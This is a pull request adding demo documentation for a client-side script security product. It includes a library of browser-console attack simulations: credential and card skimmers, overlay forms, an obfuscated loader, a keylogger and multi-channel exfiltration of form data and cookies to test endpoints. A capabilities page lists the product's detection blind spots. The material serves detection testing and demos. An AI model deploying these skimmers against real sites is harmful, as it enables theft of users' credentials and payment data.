### PR TITLE
docs: add CSD capabilities, attack script library, and enhanced detection

### DIFF
--- a/docs/attack-scripts.mdx
+++ b/docs/attack-scripts.mdx
@@ -1,0 +1,620 @@
+---
+title: Attack Script Library
+sidebar:
+  order: 8
+  label: Attack Script Library
+---
+
+import { Aside, Code } from "@astrojs/starlight/components";
+
+This page provides a library of attack simulation scripts organized by category. Each script is a self-executing function (IIFE) designed to paste into the browser DevTools Console on the demo application. Use these scripts to exercise specific CSD detection capabilities during customer demos.
+
+<Aside type="caution">
+These scripts are for **authorized pre-production validation only**. All exfiltration targets are safe public endpoints (`httpbin.org`, `jsonplaceholder.typicode.com`). All injected scripts load benign libraries from public CDNs.
+</Aside>
+
+## Safety Rules
+
+All scripts in this library follow these conventions:
+
+- **IIFE format** — self-executing, paste-and-run in DevTools Console
+- **Safe exfil targets** — `httpbin.org`, `jsonplaceholder.typicode.com`
+- **Safe script sources** — `cdn.jsdelivr.net`, `cdnjs.cloudflare.com`, `unpkg.com` (loading benign libraries)
+- **`mode: 'no-cors'`** on all fetch calls
+- **`var` declarations** for console compatibility
+- **Console output** prefixed with `[CSD Demo]` and a category tag
+- **No actual malicious payloads**
+
+---
+
+## 1. Formjacking &amp; Credential Harvesting
+
+### Login Page Credential Skimmer
+
+**Target page:** `/#/login` — enter dummy credentials before running
+
+**CSD signals:** Form field reads (email, password), network (fetch to external domains)
+
+export const loginSkimmer = `// CSD Demo — Login Credential Skimmer
+(function() {
+    console.log('[CSD Demo][Formjack] Starting login credential skimmer...');
+
+    // Read existing form fields (CSD detects field reads on page-load DOM fields)
+    var inputs = document.querySelectorAll('input');
+    var creds = {};
+    inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        creds[name] = input.value || '(empty)';
+    });
+    console.log('[CSD Demo][Formjack] Harvested credentials:', creds);
+
+    // Exfiltrate via fetch
+    var payload = JSON.stringify({ type: 'login_harvest', data: creds, timestamp: Date.now() });
+    fetch('https://httpbin.org/post', {
+        method: 'POST',
+        mode: 'no-cors',
+        body: payload
+    }).then(function() {
+        console.log('[CSD Demo][Formjack] Credentials exfiltrated to httpbin.org');
+    });
+
+    console.log('[CSD Demo][Formjack] Simulation complete.');
+})();`;
+
+<Code code={loginSkimmer} lang="js" title="Login Credential Skimmer" />
+
+**Verify in CSD console:**
+- **Script List** — application scripts (e.g., `main.js`) flagged High Risk for reading email and password fields
+- **Form Fields** — email and password shown as Sensitive (by system)
+
+### Registration Page Harvester
+
+**Target page:** `/#/register` — fill in all fields before running
+
+**CSD signals:** Form field reads (email, password, security question)
+
+export const regHarvester = `// CSD Demo — Registration Page Harvester
+(function() {
+    console.log('[CSD Demo][Formjack] Starting registration harvester...');
+
+    var inputs = document.querySelectorAll('input, select');
+    var data = {};
+    inputs.forEach(function(el) {
+        var name = el.name || el.id || el.type || el.tagName;
+        data[name] = el.value || '(empty)';
+    });
+    console.log('[CSD Demo][Formjack] Registration data harvested:', data);
+
+    var payload = JSON.stringify({ type: 'registration_harvest', data: data, timestamp: Date.now() });
+    fetch('https://jsonplaceholder.typicode.com/posts', {
+        method: 'POST',
+        mode: 'no-cors',
+        headers: { 'Content-Type': 'application/json' },
+        body: payload
+    }).then(function() {
+        console.log('[CSD Demo][Formjack] Registration data exfiltrated to jsonplaceholder.typicode.com');
+    });
+
+    console.log('[CSD Demo][Formjack] Simulation complete.');
+})();`;
+
+<Code code={regHarvester} lang="js" title="Registration Page Harvester" />
+
+**Verify in CSD console:**
+- **Form Fields** — registration fields appear with sensitivity classification
+- **Script List** — scripts reading registration fields flagged for review
+
+---
+
+## 2. Digital Skimming
+
+### Payment Page Card Skimmer
+
+**Target page:** `/#/login` (Juice Shop checkout requires authentication — use the login page to demonstrate the overlay technique)
+
+**CSD signals:** Script injection (overlay form), form field reads (original fields)
+
+export const cardSkimmer = `// CSD Demo — Payment Card Skimmer (Overlay Technique)
+(function() {
+    console.log('[CSD Demo][Skim] Starting payment card skimmer simulation...');
+
+    // Step 1: Read existing form fields first
+    var inputs = document.querySelectorAll('input');
+    var existing = {};
+    inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        existing[name] = input.value || '(empty)';
+    });
+    console.log('[CSD Demo][Skim] Existing fields harvested:', existing);
+
+    // Step 2: Inject a fake overlay form (CSD detects the script injection)
+    var overlay = document.createElement('div');
+    overlay.id = 'csd-demo-overlay';
+    overlay.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.7);z-index:99999;display:flex;align-items:center;justify-content:center;';
+    overlay.innerHTML = '<div style="background:white;padding:30px;border-radius:8px;max-width:400px;width:100%;">' +
+        '<h3 style="margin:0 0 15px;color:#333;">Payment Verification Required</h3>' +
+        '<p style="color:#666;font-size:14px;">Session expired. Re-enter payment details.</p>' +
+        '<div style="margin:10px 0;padding:8px;border:1px solid #ccc;border-radius:4px;color:#999;">4111-XXXX-XXXX-1111</div>' +
+        '<div style="margin:10px 0;padding:8px;border:1px solid #ccc;border-radius:4px;color:#999;">CVV: ***</div>' +
+        '<div style="text-align:right;margin-top:15px;">' +
+        '<button onclick="document.getElementById(\\'csd-demo-overlay\\').remove();console.log(\\'[CSD Demo][Skim] Overlay dismissed\\');" style="padding:8px 20px;background:#4CAF50;color:white;border:none;border-radius:4px;cursor:pointer;">Verify</button></div></div>';
+    document.body.appendChild(overlay);
+    console.log('[CSD Demo][Skim] Fake payment overlay injected into DOM');
+
+    // Step 3: Exfiltrate captured data
+    var payload = JSON.stringify({ type: 'card_skim', captured: existing, timestamp: Date.now() });
+    fetch('https://httpbin.org/post', {
+        method: 'POST',
+        mode: 'no-cors',
+        body: payload
+    }).then(function() {
+        console.log('[CSD Demo][Skim] Skimmed data exfiltrated to httpbin.org');
+    });
+
+    console.log('[CSD Demo][Skim] Simulation complete. Click "Verify" on the overlay to dismiss it.');
+})();`;
+
+<Code code={cardSkimmer} lang="js" title="Payment Card Skimmer (Overlay)" />
+
+**Verify in CSD console:**
+- **Script List** — scripts flagged for DOM manipulation and field reads
+- **Form Fields** — original page fields shown with read activity
+
+### Multi-Stage Obfuscated Loader
+
+**Target page:** Any page on the demo site
+
+**CSD signals:** Script injection (decoded payload creates new script tag)
+
+export const obfuscatedLoader = `// CSD Demo — Multi-Stage Obfuscated Loader
+(function() {
+    console.log('[CSD Demo][Skim] Starting obfuscated loader simulation...');
+
+    // Stage 1: Base64-encoded script URL (simulates obfuscation)
+    var encoded = btoa('https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js');
+    console.log('[CSD Demo][Skim] Stage 1: Encoded payload:', encoded);
+
+    // Stage 2: Decode and inject
+    var decoded = atob(encoded);
+    console.log('[CSD Demo][Skim] Stage 2: Decoded URL:', decoded);
+
+    var script = document.createElement('script');
+    script.src = decoded;
+    script.onload = function() {
+        console.log('[CSD Demo][Skim] Stage 3: Decoded script loaded successfully from', decoded);
+    };
+    script.onerror = function() {
+        console.log('[CSD Demo][Skim] Stage 3: Script load attempted (may be blocked by CSP)');
+    };
+    document.head.appendChild(script);
+
+    console.log('[CSD Demo][Skim] Simulation complete. CSD detects the injected script tag regardless of encoding.');
+})();`;
+
+<Code code={obfuscatedLoader} lang="js" title="Multi-Stage Obfuscated Loader" />
+
+**Verify in CSD console:**
+- **Script List** — `cdn.jsdelivr.net` script appears as new entry
+- **Network** — `cdn.jsdelivr.net` domain listed
+
+---
+
+## 3. Supply Chain &amp; Script Injection
+
+### Multi-CDN Injection
+
+**Target page:** Any page on the demo site
+
+**CSD signals:** Script injection (3 new third-party script tags), network (3 new domains)
+
+export const multiCdn = `// CSD Demo — Multi-CDN Script Injection
+(function() {
+    console.log('[CSD Demo][Supply Chain] Starting multi-CDN injection...');
+
+    var cdns = [
+        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
+        { url: 'https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.30.1/moment.min.js', name: 'cdnjs' },
+        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' }
+    ];
+
+    cdns.forEach(function(cdn) {
+        var script = document.createElement('script');
+        script.src = cdn.url;
+        script.onload = function() {
+            console.log('[CSD Demo][Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url);
+        };
+        script.onerror = function() {
+            console.log('[CSD Demo][Supply Chain] Load attempted from ' + cdn.name + ' (may be blocked)');
+        };
+        document.head.appendChild(script);
+        console.log('[CSD Demo][Supply Chain] Injected script tag: ' + cdn.name);
+    });
+
+    console.log('[CSD Demo][Supply Chain] 3 third-party scripts injected. CSD will detect all 3 new domains.');
+})();`;
+
+<Code code={multiCdn} lang="js" title="Multi-CDN Script Injection" />
+
+**Verify in CSD console:**
+- **Script List** — 3 new script entries from `cdn.jsdelivr.net`, `cdnjs.cloudflare.com`, `unpkg.com`
+- **Network** — all 3 CDN domains appear in the All Domains list
+
+### Tag Manager Hijack Simulation
+
+**Target page:** Any page on the demo site
+
+**CSD signals:** Script injection (fake analytics/tag manager script)
+
+export const tagManagerHijack = `// CSD Demo — Tag Manager Hijack
+(function() {
+    console.log('[CSD Demo][Supply Chain] Starting tag manager hijack simulation...');
+
+    // Simulate a compromised tag manager loading a malicious analytics script
+    var fakeTag = document.createElement('script');
+    fakeTag.src = 'https://cdn.jsdelivr.net/npm/chart.js@4.4.7/dist/chart.umd.min.js';
+    fakeTag.setAttribute('data-tag-manager', 'hijacked');
+    fakeTag.onload = function() {
+        console.log('[CSD Demo][Supply Chain] Fake analytics script loaded via tag manager hijack');
+
+        // After loading, read form fields (simulating data collection by compromised tag)
+        var inputs = document.querySelectorAll('input');
+        var collected = {};
+        inputs.forEach(function(input) {
+            var name = input.name || input.id || input.type;
+            collected[name] = input.value || '(empty)';
+        });
+        console.log('[CSD Demo][Supply Chain] Compromised tag collected form data:', collected);
+    };
+    fakeTag.onerror = function() {
+        console.log('[CSD Demo][Supply Chain] Script load attempted (may be blocked)');
+    };
+    document.head.appendChild(fakeTag);
+
+    console.log('[CSD Demo][Supply Chain] Tag manager hijack simulation complete.');
+})();`;
+
+<Code code={tagManagerHijack} lang="js" title="Tag Manager Hijack" />
+
+**Verify in CSD console:**
+- **Script List** — new script from `cdn.jsdelivr.net` with `chart.js` path
+- **Form Fields** — if run on a page with forms, field read activity increases
+
+---
+
+## 4. Data Exfiltration Channels
+
+### Multi-Channel Exfiltration
+
+**Target page:** `/#/login` — enter dummy credentials before running
+
+**CSD signals:** Form field reads, network (fetch source domain)
+
+export const multiChannel = `// CSD Demo — Multi-Channel Exfiltration
+(function() {
+    console.log('[CSD Demo][Exfil] Starting multi-channel exfiltration...');
+
+    // Harvest form fields
+    var inputs = document.querySelectorAll('input');
+    var data = {};
+    inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        data[name] = input.value || '(empty)';
+    });
+    console.log('[CSD Demo][Exfil] Data harvested:', data);
+    var payload = JSON.stringify({ type: 'multi_channel', data: data, timestamp: Date.now() });
+
+    // Channel 1: Fetch POST
+    fetch('https://httpbin.org/post', {
+        method: 'POST',
+        mode: 'no-cors',
+        body: payload
+    }).then(function() {
+        console.log('[CSD Demo][Exfil] Channel 1 (fetch POST) sent to httpbin.org');
+    });
+
+    // Channel 2: Image beacon
+    var img = new Image();
+    img.src = 'https://httpbin.org/get?data=' + encodeURIComponent(payload).substring(0, 200);
+    img.onload = function() { console.log('[CSD Demo][Exfil] Channel 2 (image beacon) sent to httpbin.org'); };
+    img.onerror = function() { console.log('[CSD Demo][Exfil] Channel 2 (image beacon) attempted'); };
+    console.log('[CSD Demo][Exfil] Channel 2 (image beacon) initiated');
+
+    // Channel 3: Link prefetch
+    var link = document.createElement('link');
+    link.rel = 'prefetch';
+    link.href = 'https://jsonplaceholder.typicode.com/posts?exfil=' + encodeURIComponent(payload).substring(0, 200);
+    document.head.appendChild(link);
+    console.log('[CSD Demo][Exfil] Channel 3 (link prefetch) injected');
+
+    console.log('[CSD Demo][Exfil] 3 exfil channels attempted. Note: CSD Network view tracks script source domains, not fetch/beacon destinations.');
+})();`;
+
+<Code code={multiChannel} lang="js" title="Multi-Channel Exfiltration" />
+
+<Aside type="note">
+CSD's Network view shows **script-load source domains**, not fetch/XHR/beacon destinations. The exfiltration targets (`httpbin.org`, `jsonplaceholder.typicode.com`) will **not** appear in the Network view. The primary CSD detection signal here is **form field reads** by the executing script.
+</Aside>
+
+**Verify in CSD console:**
+- **Form Fields** — email and password fields show read activity
+- **Script List** — application scripts flagged for field reads
+
+### High-Volume Domain Exfiltration
+
+**Target page:** `/#/login` — enter dummy credentials before running
+
+**CSD signals:** Form field reads, script injection (script tags from multiple domains)
+
+export const highVolume = `// CSD Demo — High-Volume Domain Exfiltration
+(function() {
+    console.log('[CSD Demo][Exfil] Starting high-volume exfiltration simulation...');
+
+    // Harvest form data
+    var inputs = document.querySelectorAll('input');
+    var data = {};
+    inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        data[name] = input.value || '(empty)';
+    });
+    console.log('[CSD Demo][Exfil] Data harvested:', data);
+
+    // Inject scripts from multiple CDN domains (these WILL appear in CSD Network view)
+    var sources = [
+        'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js',
+        'https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.30.1/moment.min.js',
+        'https://unpkg.com/underscore@1.13.7/underscore-min.js',
+        'https://cdn.jsdelivr.net/npm/chart.js@4.4.7/dist/chart.umd.min.js',
+        'https://cdnjs.cloudflare.com/ajax/libs/axios/1.7.9/axios.min.js'
+    ];
+
+    sources.forEach(function(src, i) {
+        var script = document.createElement('script');
+        script.src = src;
+        script.onload = function() {
+            console.log('[CSD Demo][Exfil] Script ' + (i + 1) + '/' + sources.length + ' loaded: ' + src);
+        };
+        script.onerror = function() {
+            console.log('[CSD Demo][Exfil] Script ' + (i + 1) + ' load attempted');
+        };
+        document.head.appendChild(script);
+    });
+
+    // Also send via fetch to safe endpoints
+    var payload = JSON.stringify({ type: 'high_volume', data: data, timestamp: Date.now() });
+    fetch('https://httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload });
+    fetch('https://jsonplaceholder.typicode.com/posts', { method: 'POST', mode: 'no-cors', body: payload });
+
+    console.log('[CSD Demo][Exfil] ' + sources.length + ' script injections + 2 fetch channels. Script domains will appear in CSD Network view.');
+})();`;
+
+<Code code={highVolume} lang="js" title="High-Volume Domain Exfiltration" />
+
+**Verify in CSD console:**
+- **Script List** — 5 new third-party script entries
+- **Network** — `cdn.jsdelivr.net`, `cdnjs.cloudflare.com`, `unpkg.com` domains listed
+- **Form Fields** — login fields show read activity
+
+---
+
+## 5. DOM Manipulation &amp; Overlay
+
+### Form Overlay Attack
+
+**Target page:** `/#/login`
+
+**CSD signals:** Form field reads (reads original fields before overlaying)
+
+export const formOverlay = `// CSD Demo — Form Overlay Attack
+(function() {
+    console.log('[CSD Demo][DOM] Starting form overlay attack...');
+
+    // Read the real form fields first
+    var inputs = document.querySelectorAll('input');
+    var realData = {};
+    inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        realData[name] = input.value || '(empty)';
+    });
+    console.log('[CSD Demo][DOM] Real form data captured:', realData);
+
+    // Find the form container and overlay it
+    var form = document.querySelector('form') || document.querySelector('[class*="login"]') || document.querySelector('mat-card');
+    if (form) {
+        var rect = form.getBoundingClientRect();
+        var overlay = document.createElement('div');
+        overlay.id = 'csd-demo-form-overlay';
+        overlay.style.cssText = 'position:fixed;top:' + rect.top + 'px;left:' + rect.left + 'px;width:' + rect.width + 'px;height:' + rect.height + 'px;background:white;z-index:99999;display:flex;flex-direction:column;justify-content:center;padding:20px;box-sizing:border-box;border:2px solid #e0e0e0;border-radius:8px;';
+        overlay.innerHTML = '<h4 style="margin:0 0 10px;color:#333;">Sign In</h4>' +
+            '<input type="email" placeholder="Email" style="margin:5px 0;padding:8px;border:1px solid #ccc;border-radius:4px;" />' +
+            '<input type="password" placeholder="Password" style="margin:5px 0;padding:8px;border:1px solid #ccc;border-radius:4px;" />' +
+            '<button onclick="document.getElementById(\\'csd-demo-form-overlay\\').remove();console.log(\\'[CSD Demo][DOM] Overlay dismissed\\');" style="margin-top:10px;padding:8px;background:#1976d2;color:white;border:none;border-radius:4px;cursor:pointer;">Log in</button>';
+        document.body.appendChild(overlay);
+        console.log('[CSD Demo][DOM] Transparent overlay form placed over real login form');
+    } else {
+        console.log('[CSD Demo][DOM] No form container found — overlay skipped');
+    }
+
+    console.log('[CSD Demo][DOM] Simulation complete. The overlay captures input instead of the real form.');
+})();`;
+
+<Code code={formOverlay} lang="js" title="Form Overlay Attack" />
+
+<Aside type="note">
+CSD does **not** track dynamically created form fields. The overlay's injected `input` elements will not appear in the CSD Form Fields view. CSD detects this attack through the **original field reads** that happen before the overlay is placed.
+</Aside>
+
+**Verify in CSD console:**
+- **Form Fields** — original email and password fields show read activity
+- **Script List** — scripts flagged for field access
+
+### Keylogger Simulation
+
+**Target page:** `/#/login`
+
+**CSD signals:** Form field reads (accesses input elements to attach listeners)
+
+export const keylogger = `// CSD Demo — Keylogger Simulation
+(function() {
+    console.log('[CSD Demo][DOM] Starting keylogger simulation...');
+
+    var keyBuffer = [];
+    var flushInterval = 5000;
+
+    // Attach keydown listener to capture keystrokes
+    document.addEventListener('keydown', function(e) {
+        keyBuffer.push({
+            key: e.key,
+            target: (e.target.name || e.target.id || e.target.tagName),
+            timestamp: Date.now()
+        });
+        if (keyBuffer.length >= 10) {
+            console.log('[CSD Demo][DOM] Keylogger buffer (last 10 keys):', JSON.parse(JSON.stringify(keyBuffer.slice(-10))));
+        }
+    });
+    console.log('[CSD Demo][DOM] Keydown listener attached to document');
+
+    // Also read current form field values
+    var inputs = document.querySelectorAll('input');
+    inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        console.log('[CSD Demo][DOM] Monitoring field: ' + name + ' (current value: ' + (input.value || '(empty)') + ')');
+    });
+
+    // Periodic flush simulation
+    var flushCount = 0;
+    var interval = setInterval(function() {
+        flushCount++;
+        if (keyBuffer.length > 0) {
+            console.log('[CSD Demo][DOM] Keylogger flush #' + flushCount + ':', keyBuffer.length, 'keystrokes captured');
+            fetch('https://httpbin.org/post', {
+                method: 'POST',
+                mode: 'no-cors',
+                body: JSON.stringify({ type: 'keylog', keys: keyBuffer, timestamp: Date.now() })
+            });
+            keyBuffer = [];
+        }
+        if (flushCount >= 6) {
+            clearInterval(interval);
+            console.log('[CSD Demo][DOM] Keylogger simulation ended (30s max duration)');
+        }
+    }, flushInterval);
+
+    console.log('[CSD Demo][DOM] Keylogger active for 30 seconds. Type in form fields to see captured output.');
+})();`;
+
+<Code code={keylogger} lang="js" title="Keylogger Simulation" />
+
+**Verify in CSD console:**
+- **Form Fields** — input fields show read activity from the monitoring script
+- **Script List** — scripts flagged for accessing form field values
+
+---
+
+## 6. Combined Stress Test
+
+### Maximum Detection Script
+
+This script combines all attack vectors into a single IIFE — the "ultimate demo" script. Run this when you want to trigger every CSD detection signal in one execution.
+
+**Target page:** `/#/login` — enter dummy credentials before running
+
+**CSD signals:** Form field reads, script injection (3 CDN domains), network (3 new domains)
+
+export const maxDetection = `// CSD Demo — Maximum Detection (Combined Stress Test)
+(function() {
+    console.log('='.repeat(60));
+    console.log('[CSD Demo] MAXIMUM DETECTION — Combined Stress Test');
+    console.log('='.repeat(60));
+
+    // Phase 1: Form Field Harvesting
+    console.log('\\n--- Phase 1: Form Field Harvesting ---');
+    var inputs = document.querySelectorAll('input');
+    var harvested = {};
+    inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        harvested[name] = input.value || '(empty)';
+    });
+    console.log('[CSD Demo][Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);
+
+    // Phase 2: Multi-CDN Script Injection
+    console.log('\\n--- Phase 2: Supply Chain — Multi-CDN Injection ---');
+    var cdns = [
+        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr (lodash)' },
+        { url: 'https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.30.1/moment.min.js', name: 'cdnjs (moment)' },
+        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg (underscore)' }
+    ];
+    cdns.forEach(function(cdn) {
+        var script = document.createElement('script');
+        script.src = cdn.url;
+        script.onload = function() {
+            console.log('[CSD Demo][Supply Chain] Loaded: ' + cdn.name);
+        };
+        script.onerror = function() {
+            console.log('[CSD Demo][Supply Chain] Load attempted: ' + cdn.name);
+        };
+        document.head.appendChild(script);
+        console.log('[CSD Demo][Supply Chain] Injected: ' + cdn.name);
+    });
+
+    // Phase 3: Data Exfiltration (multiple channels)
+    console.log('\\n--- Phase 3: Data Exfiltration ---');
+    var payload = JSON.stringify({
+        type: 'max_detection',
+        credentials: harvested,
+        page: window.location.href,
+        cookies: document.cookie,
+        timestamp: Date.now()
+    });
+
+    // Fetch POST
+    fetch('https://httpbin.org/post', {
+        method: 'POST',
+        mode: 'no-cors',
+        body: payload
+    }).then(function() {
+        console.log('[CSD Demo][Exfil] Fetch POST sent to httpbin.org');
+    });
+
+    // Fetch POST (second endpoint)
+    fetch('https://jsonplaceholder.typicode.com/posts', {
+        method: 'POST',
+        mode: 'no-cors',
+        headers: { 'Content-Type': 'application/json' },
+        body: payload
+    }).then(function() {
+        console.log('[CSD Demo][Exfil] Fetch POST sent to jsonplaceholder.typicode.com');
+    });
+
+    // Image beacon
+    var img = new Image();
+    img.src = 'https://httpbin.org/get?beacon=' + encodeURIComponent(payload).substring(0, 200);
+    console.log('[CSD Demo][Exfil] Image beacon sent to httpbin.org');
+
+    // Phase 4: DOM Manipulation
+    console.log('\\n--- Phase 4: DOM Manipulation ---');
+    var banner = document.createElement('div');
+    banner.id = 'csd-demo-banner';
+    banner.style.cssText = 'position:fixed;top:0;left:0;width:100%;padding:12px;background:#d32f2f;color:white;text-align:center;z-index:99999;font-family:sans-serif;font-size:14px;';
+    banner.innerHTML = 'CSD Demo: Attack simulation active — ' + cdns.length + ' scripts injected, ' + Object.keys(harvested).length + ' fields harvested ' +
+        '<button onclick="document.getElementById(\\'csd-demo-banner\\').remove();" style="margin-left:15px;padding:4px 12px;background:white;color:#d32f2f;border:none;border-radius:3px;cursor:pointer;">Dismiss</button>';
+    document.body.appendChild(banner);
+    console.log('[CSD Demo][DOM] Attack status banner injected');
+
+    // Summary
+    console.log('\\n' + '='.repeat(60));
+    console.log('[CSD Demo] SIMULATION COMPLETE');
+    console.log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
+    console.log('[CSD Demo] Scripts injected: ' + cdns.length + ' (from ' + cdns.length + ' CDN domains)');
+    console.log('[CSD Demo] Exfil channels: 3 (2x fetch + 1x image beacon)');
+    console.log('[CSD Demo] Detection takes 5-10 minutes to appear in CSD console.');
+    console.log('='.repeat(60));
+})();`;
+
+<Code code={maxDetection} lang="js" title="Maximum Detection — Combined Stress Test" />
+
+**Verify in CSD console (after 5-10 minutes):**
+- **Dashboard** — Transactions Consumed counter increments
+- **Script List** — application scripts flagged High Risk; 3 new third-party scripts from CDN domains
+- **Form Fields** — email and password classified as Sensitive (by system) with read activity
+- **Network** — `cdn.jsdelivr.net`, `cdnjs.cloudflare.com`, `unpkg.com` appear in All Domains
+- **Affected Users** — your session appears with IP, geolocation, browser, device info

--- a/docs/capabilities.mdx
+++ b/docs/capabilities.mdx
@@ -1,0 +1,87 @@
+---
+title: CSD Capabilities
+sidebar:
+  order: 6
+  label: CSD Capabilities
+---
+
+import { Aside } from "@astrojs/starlight/components";
+
+## How CSD Works
+
+F5 Distributed Cloud Client-Side Defense (CSD) protects web applications from client-side attacks by monitoring JavaScript behavior directly in the browser. The F5 XC load balancer injects a telemetry script into every page served to the client. This script observes all JavaScript activity — which scripts load, which form fields they read, and which network connections they make. Telemetry data is sent to the F5 XC platform where machine learning models analyze script behavior, assign risk scores, and flag anomalies. Security teams review detections in the CSD console and take action by allowing or mitigating script domains.
+
+## Core Detection Signals
+
+CSD monitors three categories of browser-side behavior:
+
+| Signal | What CSD Observes | Example |
+| --- | --- | --- |
+| **Form field reads** | Which scripts access which `input` fields present in the page DOM at load time | `main.js` reading the `password` field on `/login` |
+| **Script inventory** | All first-party and third-party JavaScript loaded on each page, tracked by source domain | A new `<script>` tag loading from `cdn.jsdelivr.net` appearing on the login page |
+| **Network interactions** | Domains that scripts load resources from (script source domains) | Scripts sourced from `cdnjs.cloudflare.com` appearing in the Network view |
+
+<Aside type="caution">
+CSD tracks **script-load source domains** in the Network view — not fetch/XHR destination domains. If a script sends data via `fetch()` to `evil.com`, that domain does not appear in the Network view. See [Detection Boundaries](#detection-boundaries) for the full list of limitations.
+</Aside>
+
+## Feature Matrix
+
+| Feature | Description | Console Location |
+| --- | --- | --- |
+| **Script risk scoring** | Automatic classification: No Risk, Low Risk, High Risk | Script List &rarr; Risk Level column |
+| **Form field sensitivity** | Auto-classifies fields as Sensitive (by system) based on field type and name | Form Fields view &rarr; Analysis column |
+| **Behavior timeline** | Charts script risk level, source domain, and type over time | Script detail &rarr; Overview &rarr; Behaviors Over Time |
+| **Affected user attribution** | Tracks impacted users by IP, geolocation, browser, and device | Script detail &rarr; Affected Users tab |
+| **Domain allow list** | Mark trusted script domains as allowed | Dashboard &rarr; domain row &rarr; Add To Allow List |
+| **Domain mitigate list** | Block scripts from specific domains on next page load | Dashboard &rarr; domain row &rarr; Add To Mitigate List |
+| **Alert configuration** | Notifications for new domains, risk changes, suspicious behavior | Notifications section |
+| **Script justification** | Add notes explaining why a script is authorized (PCI DSS compliance) | Script detail &rarr; Justification field |
+| **Transaction tracking** | Monthly telemetry event counter confirming CSD is active | Dashboard &rarr; Transactions Consumed card |
+| **Time and location filters** | Filter all views by time range (24h, 7d, 30d) and location | Top bar filter controls |
+
+## Detection Boundaries
+
+Understanding what CSD does **not** monitor is critical for setting accurate demo expectations:
+
+| Limitation | Detail |
+| --- | --- |
+| **Dynamically created fields** | CSD only tracks `input` fields present in the DOM at page load. Fields injected by JavaScript after load are not monitored. |
+| **Fetch/XHR destinations** | The Network view shows script-load source domains only. Domains contacted via `fetch()`, `XMLHttpRequest`, or image beacons do not appear. |
+| **Code-level patterns** | CSD does not flag `eval()`, `Function()`, or other obfuscation techniques as separate detection signals. |
+| **Dashboard counters** | Summary cards (Action Needed, Found &amp; Mitigated, etc.) only increment after an admin actions a domain. New detections appear in the Script List first. |
+| **First-party script domains** | The Dashboard domain table tracks third-party script domains only. High-risk first-party scripts appear in the Script List but not on the Dashboard. |
+
+## PCI DSS v4.0 Mapping
+
+CSD directly addresses two PCI DSS v4.0 requirements for payment page security:
+
+| PCI DSS Requirement | What It Requires | How CSD Addresses It |
+| --- | --- | --- |
+| **6.4.3** — Script management on payment pages | Maintain an inventory of all scripts, provide written authorization and justification for each, verify script integrity | Script List provides full inventory; Justification field documents authorization; behavior timeline tracks changes |
+| **11.6.1** — Tamper detection on payment pages | Detect unauthorized modifications to HTTP headers and payment page content | CSD telemetry detects new script injections, unauthorized form field reads, and new network domains — alerting on changes to page behavior |
+
+<Aside type="tip">
+Use the **Script justification** feature to document why each script is authorized on payment pages. This creates an audit trail that maps directly to PCI DSS 6.4.3 authorization requirements.
+</Aside>
+
+## Threat Coverage Matrix
+
+The following table maps common client-side attack categories to the CSD detection signals that would fire during each attack type:
+
+| Attack Category | Description | Field Reads | Script Injection | Network |
+| --- | --- | --- | --- | --- |
+| **Formjacking** | Malicious script reads form field values and exfiltrates them | Yes | — | Yes |
+| **Digital skimming** | Injects overlay forms or scripts to capture payment data | Yes | Yes | Yes |
+| **Supply chain attack** | Compromised third-party library loads malicious code | — | Yes | Yes |
+| **DOM manipulation** | Injects or modifies page elements to deceive users | — | Yes | — |
+| **Data exfiltration** | Reads sensitive data and sends it to external domains | Yes | — | Yes |
+| **Script injection** | Inserts unauthorized `<script>` tags into the page | — | Yes | Yes |
+| **Man-in-the-Browser** | Intercepts form data within the browser session | Yes | — | Yes |
+| **Cryptojacking** | Injects cryptocurrency mining scripts | — | Yes | Yes |
+| **Clickjacking** | Overlays invisible frames to hijack user clicks | — | Yes | — |
+| **Web skimmer persistence** | Re-injects skimmer scripts across page navigations | — | Yes | Yes |
+
+<Aside type="note">
+"Network" detection depends on whether the attack loads scripts from external domains. Exfiltration via `fetch()` or image beacons to external domains is **not** visible in the CSD Network view — only script-load source domains are tracked.
+</Aside>

--- a/docs/demo-detection.mdx
+++ b/docs/demo-detection.mdx
@@ -1,60 +1,90 @@
 ---
 title: Detection & Mitigation
 sidebar:
-  order: 6
+  order: 7
   label: Detection & Mitigation
 ---
 
 import { Aside, Code, Steps } from "@astrojs/starlight/components";
 
-export const triggerScript = `// CSD Formjacking Simulation — paste into DevTools Console on the login page
+export const combinedScript = `// CSD Demo — Combined Detection Script
+// Triggers ALL CSD detection signals: field reads, script injection, exfiltration
 (function() {
-    console.log('[CSD Demo] Starting formjacking simulation...');
+    console.log('='.repeat(50));
+    console.log('[CSD Demo] Combined Detection Script — Starting');
+    console.log('='.repeat(50));
 
-    // Step 1: Harvest existing form fields (CSD tracks fields present at page load)
-    const inputs = document.querySelectorAll('input');
-    const harvested = {};
+    // Phase 1: Harvest all form fields (CSD tracks field reads on page-load DOM fields)
+    console.log('\\n[Formjack] Phase 1: Form field harvesting');
+    var inputs = document.querySelectorAll('input');
+    var harvested = {};
     inputs.forEach(function(input) {
-        const name = input.name || input.id || input.type;
+        var name = input.name || input.id || input.type;
         harvested[name] = input.value || '(empty)';
     });
-    console.log('[CSD Demo] Harvested ' + Object.keys(harvested).length + ' form fields:', harvested);
